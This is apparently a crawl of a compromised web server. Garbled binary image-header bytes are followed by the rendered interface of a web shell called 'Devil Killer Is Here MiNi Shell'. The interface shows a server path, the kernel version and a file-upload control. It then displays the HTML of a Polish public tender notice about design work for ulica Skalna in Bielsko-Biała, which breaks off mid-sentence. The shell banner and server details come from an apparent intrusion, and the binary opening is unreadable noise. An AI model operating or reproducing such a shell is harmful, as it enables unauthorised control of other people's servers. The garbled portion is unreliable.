JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230919/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230919/0040270001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie dokumentacji projektowej dla zadania pn.: „Rozbudowa ulicy Skalnej w Bielsku-Białej” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Bielsko-Biała - Miejski Zarząd Dróg w Bielsku-Białej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 070493318</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Michała Grażyńskiego 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bielsko-Biała</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL225 - Bielski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">33 4726010</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@mzd.bielsko.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mzd.bielsko.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Zarządzanie drogami </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie dokumentacji projektowej dla zadania pn.: „Rozbudowa ulicy Skalnej w Bielsku-Białej” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3e593fb6-514a-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00402700</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-09-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00043971/13/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.21 Dokumentacja projektowa dla zadania pn. „Rozbudowa ulicy Skalnej w Bielsku-Białej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-3e593fb6-514a-11ee-9aa3-96d3b4440790 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja między Zamawiającym<br/>a Wykonawcami, w szczególności składanie ofert, odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod<br/>adresem: https://ezamowienia.gov.pl/<br/>2. Komunikacja między Zamawiającym a Wykonawcami, z wyłączeniem składania ofert, możliwa jest także z wykorzystaniem poczty<br/>elektronicznej (adres e-mail Zamawiającego: przetargi@mzd.bielsko.pl).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">(1.) Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto podmiotu „Wykonawca” na Platformie<br/>eZamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy<br/>eZamówienia określa Regulamin Platformy<br/>e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl/ oraz w informacjach zamieszczonych w zakładce<br/>„Centrum Pomocy”.<br/>(2.) Przeglądanie i pobieranie dokumentacji postępowania nie wymaga posiadania konta, ani logowania do Platformy e-Zamówienia.<br/>(3.) Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta<br/>„Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia.<br/>(4.) Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia<br/>wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>(5.) Wszystkie wiadomości wysłane i odebrane w postępowaniu przez Wykonawcę za pośrednictwem Platformy e-Zamówienia<br/>widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>(6.) Wykonawca składa ofertę za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania<br/>po zalogowaniu się na konto Wykonawcy. Po wybraniu przycisku „Złóż ofertę” system prezentuje okno składania oferty<br/>umożliwiające przekazanie dokumentów elektronicznych, w którym znajdują się dwa pola drag&amp;drop („przeciągnij” i „upuść”) służące<br/>do dodawania plików.<br/>(7.) Wykonawca dodaje wybrany z dysku i uprzednio podpisany „Formularz oferty” w pierwszym polu („Wypełniony formularz oferty”)<br/>– jedynie jeden plik. W kolejnym polu („Załączniki i inne dokumenty przedstawione w ofercie przez Wykonawcę”) Wykonawca dodaje<br/>pozostałe pliki stanowiące ofertę lub inne pliki składane wraz z ofertą.<br/>W przypadku, gdy formularz oferty opatrzony jest podpisem generującym oddzielny plik podpisu („xades”), plik podpisu należy<br/>przekazać poprzez dodanie go do pola „Załączniki i inne dokumenty przedstawione w ofercie przez Wykonawcę”.<br/>(8.) Zamawiający nie udostępnia interaktywnego formularza ofertowego na platformie e - Zamówienia i należy zignorować komunikat<br/>pojawiający się przy składaniu oferty, iż „Postępowanie nie posiada opublikowanego formularza do tego etapu postępowania. Plik<br/>nazwa_pliku.pdf nie jest poprawnym formularzem interaktywnym wygenerowanym na Platformie”.<br/>(9.) Wykonawca po upływie terminu do składania ofert nie może skutecznie dokonać zmiany ani wycofać złożonej oferty.<br/>(10.) Komunikacja w postępowaniu – inna niż składanie ofert - odbywa się drogą elektroniczną za pośrednictwem formularzy do<br/>komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”) lub poczty elektronicznej.<br/>Za pośrednictwem „Formularzy do komunikacji” lub poczty elektronicznej odbywa się w szczególności składanie wniosków o<br/>wyjaśnienie treści Specyfikacji Warunków Zamówienia (dalej zwanej „SWZ”), przekazywanie wezwań<br/>i zawiadomień oraz udzielanie odpowiedzi na przesłane wezwania. Formularze do komunikacji umożliwiają dołączenie załącznika do<br/>przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>(11.) Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy<br/>e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zapisy dotyczące ochrony danych osobowych zawarto w pkt. 24.3. Instrukcji dla<br/>Wykonawców (Rozdział I SWZ) oraz w Formularzu oferty (Rozdział III SWZ).</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zapisy dotyczące ochrony danych osobowych zawarto w pkt. 24.3. Instrukcji dla<br/>Wykonawców (Rozdział I SWZ) oraz w Formularzu oferty (Rozdział III SWZ).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">23/IZ/45/U</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie dokumentacji projektowej dla zadania pn.: „Rozbudowa ulicy Skalnej w Bielsku-Białej”.<br/>Określenie przedmiotu zamówienia oraz zakresu zamówienia:<br/>Przedmiotem zamówienia jest wykonanie pełnozakresowej, pełnobranżowej i kompletnej dokumentacji projektowej dla zadania pn.: „Rozbudowa ulicy Skalnej w Bielsku-Białej”, w zakresie obejmującym w szczególności:<br/>	wykonanie projektu budowlanego,<br/>	wykonanie projektu wykonawczego,<br/>	sporządzenie operatu wodnoprawnego,<br/>	przygotowanie materiałów do wydania decyzji na środowisko,<br/>	wykonanie projektu organizacji ruchu,<br/>	wykonanie dokumentacji przedmiarowo-kosztorysowej,<br/>oraz pełnienie nadzoru autorskiego nad robotami objętymi Dokumentacją.<br/>Szczegółowe określenie zakresu przedmiotu zamówienia zawarte jest w Rozdziale III - V Specyfikacji Warunków Zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">470 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie potencjału kadrowego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, spełniają określone przez Zamawiającego warunki udziału w<br/>postępowaniu, tj. w zakresie:<br/>1) wiedzy i doświadczenia:<br/>Wykonawca musi wykazać, że wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej 1 (jedną) dokumentację projektową, w skład której wchodził projekt budowlany i wykonawczy budowy lub przebudowy drogi, o długości minimum 150 m.<br/>UWAGI<br/>1.	Pojęcia „budowa”, „przebudowa”- należy rozumieć zgodnie z ustawą z dnia 07.07.1994 r. Prawo budowlane;<br/>2.	W przypadku, gdy wskazana dokumentacja, stanowi część zamówienia o szerszym zakresie, należy podać w wykazie, o którym mowa w pkt. 5.7. tylko informacje potwierdzające spełnianie ww. warunku.<br/>3.	Informację o posiadanej wiedzy i doświadczeniu Wykonawca przekaże na wezwanie Zamawiającego, o którym mowa w pkt. 5.7.na formularzu stanowiącym załącznik nr 3 do Rozdziału II SWZ.<br/>4.	W przypadku, gdy wykazywana dokumentacja projektowa została opracowana przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, Wykonawca może powołać się jedynie na zakres, w którego wykonaniu faktycznie i konkretnie uczestniczył.<br/>2) Dysponowania osobami zdolnymi do wykonania zamówienia: <br/>Wykonawca musi wykazać, iż w trakcie realizacji zamówienia będzie dysponował Projektantem branży drogowej, posiadającym doświadczenie w wykonaniu co najmniej 1 (jednej) dokumentacji projektowej, w skład której wchodził projekt budowlany i wykonawczy budowy lub przebudowy drogi, o długości minimum 150 m.<br/>UWAGI<br/>1.	Pojęcia „budowa”, „przebudowa”- należy rozumieć zgodnie z ustawą z dnia 07.07.1994 r. Prawo budowlane,<br/>2.	Osoba wskazana do pełnienia ww. funkcji powinna posiadać odpowiednie kwalifikacje (uprawnienia budowlane do projektowania) wydane na podstawie obowiązujących przepisów. <br/>3.	Informację o posiadanych przez ww. osobę kwalifikacjach (rodzaj i nr uprawnień) i doświadczeniu, Wykonawca winien zamieścić w formularzu „Potencjał Kadrowy” (załącznik nr 4 do Rozdziału II niniejszej SWZ). Każde z opracowań wskazywanych przez Wykonawcę w ww. formularzu, które Zamawiający ma uwzględnić jako odrębne zadanie, winno zostać wpisane w oddzielnym wierszu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.W celu potwierdzenia braku<br/>podstaw do wykluczenia z udziału w postępowaniu, Wykonawca winien przedłożyć odpis lub informację z Krajowego Rejestru<br/>Sądowego lub z Centralnej Ewidencji i informacji o Działalności Gospodarczej, sporządzonych nie wcześniej niż 3 miesiące przed jej<br/>złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4) ustawy Pzp.<br/>2. Pozostałe informacje znajdują się w Instrukcji dla Wykonawców.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu<br/>potwierdzenia spełniania warunków udziału w niniejszym postępowaniu, Wykonawca winien przedłożyć następujące oświadczenia i<br/>dokumenty:<br/>1. (na wezwanie Zamawiającego): wykaz usług (Doświadczenie) wykonanych w okresie ostatnich 3 lat,<br/>a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów,<br/>na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały<br/>wykonane, a jeżeli Wykonawca<br/>z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy.<br/>Wykaz ten winien zostać złożony w celu oceny spełniania warunku udziału w postępowaniu określonego<br/>w pkt 6.2.4.1. Instrukcji dla Wykonawców ( Rozdział I SWZ).<br/>Zaleca się, aby dla sporządzenia ww. oświadczenia Wykonawca posłużył się formularzem zgodnym z treścią załącznika nr 3 do<br/>Rozdziału II SWZ.<br/>2. (wraz z ofertą): Wykaz osób (Potencjał kadrowy), skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień, doświadczenia, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>W wykazie Wykonawca poda osobę, która zostanie skierowana do realizacji zamówienia oraz wskaże kwalifikacje i doświadczenie<br/>tejże osoby, potwierdzające spełnianie warunku udziału w postępowaniu określonego w pkt 6.2.4.2 Instrukcji dla Wykonawców (<br/>Rozdział I SWZ) oraz wykaże dodatkowe zamówienia wykonane przez tę osobę w celu oceny oferty w kryterium „Doświadczenie<br/>potencjału kadrowego”.<br/>Wykaz ten winien zostać złożony w celu oceny oferty w kryterium „Doświadczenie potencjału kadrowego” oraz w celu oceny<br/>spełniania warunku udziału w postępowaniu określonego w pkt 6.2.4.2. Instrukcji dla Wykonawców ( Rozdział I SWZ).<br/>Zaleca się, aby dla sporządzenia ww. oświadczenia Wykonawca posłużył się formularzem zgodnym z treścią załącznika nr 4 do Rozdziału II SWZ.<br/>3. Pozostałe informacje znajdują się w Instrukcji dla Wykonawców.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca jest zobowiązany do wniesienia wadium w wysokości:<br/>1200,00 zł (słownie: jeden tysiąc dwieście złotych 00/100);<br/><br/>Szczegółowe wymagania dotyczące wadium określono w pkt. 21 Instrukcji dla Wykonawców (Rozdział I SWZ). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać<br/>wykluczeniu z powodu przesłanek, o których mowa w pkt. 7 Instrukcji dla Wykonawców (Rozdział I SWZ), natomiast<br/>spełnianie warunków udziału w postępowaniu określonych w pkt. 6.2 Instrukcji dla Wykonawców (Rozdział I SWZ),<br/>Wykonawcy wykazują zgodnie z pkt 10.4 Instrukcji dla Wykonawców (Rozdział I SWZ).<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenia, o których mowa w pkt. 8.1<br/>Instrukcji dla Wykonawców (Rozdział I SWZ) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w<br/>którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.<br/>4. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni zobowiązani na wezwanie<br/>Zamawiającego złożyć dokumenty i oświadczenia, o których mowa w pkt 8.5 Instrukcji dla Wykonawców (Rozdział I SWZ)<br/>przy czym :<br/>a) dokumenty i oświadczenia, o których mowa w pkt 8.5.1) Instrukcji dla Wykonawców (Rozdział I SWZ) składa odpowiednio<br/>Wykonawca, który wykazuje spełnianie warunku, w zakresie i na zasadach opisanych w pkt 6.2 Instrukcji dla Wykonawców<br/>(Rozdział I SWZ);<br/>b) dokumenty i oświadczenia, o których mowa w pkt 8.5.2) Instrukcji dla Wykonawców (Rozdział I SWZ) składa każdy z<br/>nich.<br/>5.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia winni złożyć wraz z ofertą oświadczenie, z którego wynika,<br/>które usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana umowy może nastąpić:<br/>a) w przypadkach opisanych w umowie,<br/>b) co do nieistotnych postanowień umowy,<br/>c) co do istotnych postanowień umowy, z ważnych powodów, w szczególności o ile jest to konieczne i wynika z okoliczności,<br/>których nie można było przewidzieć w chwili zawarcia umowy, np. w zakresie konieczności wykonania ponownych<br/>(zmodyfikowanych) opracowań. W celu określenia wysokości wynagrodzenia za wykonanie ponownych (zmodyfikowanych)<br/>opracowań projektowych lub ich elementów, Wykonawca powinien przedłożyć do akceptacji Zamawiającego kalkulację<br/>indywidualną proponowanej ceny. W<br/>kalkulacji 